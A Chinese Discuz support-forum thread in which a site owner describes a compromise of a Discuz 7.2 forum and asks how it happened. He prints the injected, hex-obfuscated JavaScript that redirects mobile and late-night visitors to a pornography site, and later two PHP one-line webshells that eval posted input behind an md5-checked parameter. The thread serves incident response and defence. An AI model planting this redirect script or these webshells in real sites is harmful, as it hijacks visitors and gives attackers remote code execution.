黑客在dz7.2中的common.inc.php中加了转向语句，导致我论坛被跳转到黄色网站

我一开始估计，黑客是利用dz7.2的绕过全局变量漏洞，进行改写common.inc.php文件的。于是我就把liunux主机中的php.ini中的request_order值，由默认的GP，调整为GPC。但是这个改动并没有起到作用，黑客攻击依然。

目前暂时我的处理，是把common.inc.php文件设置为只读。这几天来还没有黑过。正在观察中。

但是即使黑客不能使得论坛跳转了，问题的根结还在。黑客还可以随意修改我的文件。

想问下大家，黑客是怎么做到的？怎么能防御这个攻击。


附黑客在common.inc.php中增加的跳转语句：
<script type="text/javascript">var h=new Date().getHours();if(h>=22||h<=6){window.location.href="\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x69\x64\x75\x30\x2e\x68\x6b\x31\x30\x2e\x77\x78\x64\x6c\x70\x74\x2e\x63\x6f\x6d"};if(navigator.userAgent.toLowerCase().match(/(ipod|iphone|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null){window.location.href="\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x69\x64\x75\x30\x2e\x68\x6b\x31\x30\x2e\x77\x78\x64\x6c\x70\x74\x2e\x63\x6f\x6d"};</script><script type="text/javascript">var h=new Date().getHours();if(h>=22||h<=6){window.location.href="\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x69\x64\x75\x30\x2e\x68\x6b\x31\x30\x2e\x77\x78\x64\x6c\x70\x74\x2e\x63\x6f\x6d"};if(navigator.userAgent.toLowerCase().match(/(ipod|iphone|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null){window.location.href="\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x69\x64\x75\x30\x2e\x68\x6b\x31\x30\x2e\x77\x78\x64\x6c\x70\x74\x2e\x63\x6f\x6d"};</script><script type="text/javascript">var h=new Date().getHours();if(h>=22||h<=6){window.location.href="\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x69\x64\x75\x30\x2e\x68\x6b\x31\x30\x2e\x77\x78\x64\x6c\x70\x74\x2e\x63\x6f\x6d"};if(navigator.userAgent.toLowerCase().match(/(ipod|iphone|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null){window.location.href="\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x69\x64\x75\x30\x2e\x68\x6b\x31\x30\x2e\x77\x78\x64\x6c\x70\x74\x2e\x63\x6f\x6d"};</script><script type="text/javascript">var h=new Date().getHours();if(h>=22||h<=6){window.location.href="\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x69\x64\x75\x30\x2e\x68\x6b\x31\x30\x2e\x77\x78\x64\x6c\x70\x74\x2e\x63\x6f\x6d"};if(navigator.userAgent.toLowerCase().match(/(ipod|iphone|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null){window.location.href="\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x69\x64\x75\x30\x2e\x68\x6b\x31\x30\x2e\x77\x78\x64\x6c\x70\x74\x2e\x63\x6f\x6d"};</script><script type="text/javascript">var h=new Date().getHours();if(h>=22||h<=6){window.location.href="\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x69\x64\x75\x30\x2e\x68\x6b\x31\x30\x2e\x77\x78\x64\x6c\x70\x74\x2e\x63\x6f\x6d"};if(navigator.userAgent.toLowerCase().match(/(ipod|iphone|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null){window.location.href="\x68\x74\x74\x70\x3a\x2f\x2f\x62\x61\x69\x64\x75\x30\x2e\x68\x6b\x31\x30\x2e\x77\x78\x64\x6c\x70\x74\x2e\x63\x6f\x6d"};</script>

这个黄色网站，是推广一个黄色播放器的。 由于这个播放器只能在手机上播放，黑客在语句中，还巧妙的加入了只针对手机进行跳转，用电脑访问，则正常。

我发现已经有好多论坛被黑了，都是一伙人干的。

是服务器被挂马了 不止这个文件 应该还有很多隐藏木马

crx349 发表于 2019-3-13 17:18
是服务器被挂马了 不止这个文件 应该还有很多隐藏木马

dz的后台文件校验，另一个被加了转向语句的是slide.js文件。  别的就再没有了。  
我看主要起跳转作用的就是common.inc.php这个文件，所以就没有在主贴中反映。

如果被挂马的话，那么黑客是怎么做到的呢？  即使这个木马被查出来，但是挂马的原因查不出，他下一次还是会挂马啊。

我所知的，黑客应该是使用“一句话”漏洞，但是不知他为何能取得这么大的权限的。

顶一下了。 希望官方也能帮帮忙。 感觉这不是孤立事件，因为有好多论坛都被这样黑了。

zbhsc 发表于 2019-3-13 17:29
dz的后台文件校验，另一个被加了转向语句的是slide.js文件。  别的就再没有了。  
我看主要起跳转作用的 ...

一句话可以 越权的 服务器没限制 就可以 做好安全防护是第一要务哦

mR.耗子 发表于 2019-3-14 18:08
专业清理木马  可以联系 我的QQ交谈 有偿服务 效果好~专业

你们这种人里有骗子啊。 我被你们这些留qq的骗过，删除了我所有数据，幸亏我留了备份。

已经找到木马文件了。删除了木马文件，希望以后不会再被骚扰了。

木马文件就是这样的简单语句。
一个木马文件里是这个：
<?php if(md5($_GET['cmd'])=='50247d92877126ad5eccd526d1926521'){@eval($safe="$_POST[helensb]");}?>

一个木马文件里是这个：
<script language='php'>if(md5($_GET['cmd'])=='202cb962ac59075b964b07152d234b70'){@eval($safe="$_POST[a]");}</script>

大家有兴趣的可以把这个加密翻译一下。

感谢坛友“kinglaurel”的总结帖：https://discuz.dismall.com/thread-2579944-1-1.html，让我打开了思路，把论坛文件下载下来，然后用木马扫描程序进行扫描。找到了木马。（ps：kinglaurel贴中提供的木马扫描程序没法用了，要重新下载个）